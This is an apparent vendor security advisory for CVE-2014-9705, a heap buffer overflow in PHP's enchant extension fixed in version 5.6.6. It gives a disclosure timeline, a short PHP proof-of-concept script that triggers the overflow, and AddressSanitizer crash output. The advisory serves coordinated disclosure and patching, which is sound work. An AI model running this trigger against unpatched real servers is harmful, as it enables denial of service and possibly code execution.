Community Edition
Total Tests:
This Week:
Today:
Stay in Touch

Weekly newsletter on AI, Application Security & Cybercrime


Your data will stay confidential Private and Confidential

Heap Buffer Overflow in PHP

Advisory ID:HTB23252
Product:PHP
Vendor:PHP
Vulnerable Versions:5.6.5 and probably prior
Tested Version:5.6.5
Advisory Publication:December 5, 2014 [without technical details]
Vendor Notification:December 5, 2014
Vendor Fix:February 19, 2015
Public Disclosure:December 5, 2014
Latest Update:March 15, 2015
Vulnerability Type:Buffer Errors [CWE-119]
CVE Reference:CVE-2014-9705
Risk Level:High
CVSSv2 Base Score:7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered a remote heap buffer overflow vulnerability in PHP, which can be exploited to cause a denial of service or execute arbitrary code on the target system.

1) Heap Buffer Overflow in PHP: CVE-2014-9705

The vulnerability resides within the enchant_broker_request_dict() function. A remote attacker can overwrite 4 bytes of heap buffer and cause a denial of service or execute arbitrary code on the target system.

PoC
========
<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>


Result:
========
[Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
---------------------------------------
/h ome/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
Start: OK
End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
At least 4 bytes overflown
---------------------------------------
======================== =========================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
#10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
#2 0xb616ef1e in ?? ??:0
#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
#4 0xb6184b7f in __asan_report_error ??:?
#5 0xb617db2e in __asan_report_store4 ??:?
#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

How to Detect Buffer Errors Vulnerabilities
Free Website Security Test
  • Non-intrusive GDPR Test
  • Non-intrusive PCI DSS Test
Try Free Test
ImmuniWeb® On-Demand
  • Complete GDPR Audit
  • Complete PCI DSS Audit
  • Remediation Guidelines
  • DevSecOps Integration
Learn More

Solution:
Install the latest version 5.6.6.
http://php.net/archive/2015.php#id2015-02-19-2


References:
[1] High-Tech Bridge Advisory HTB23252 - https://www.immuniweb.com/advisory/HTB23252 - Heap Buffer Overflow in PHP.
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[5] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.
User Comments
Add Comment


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Ask a Question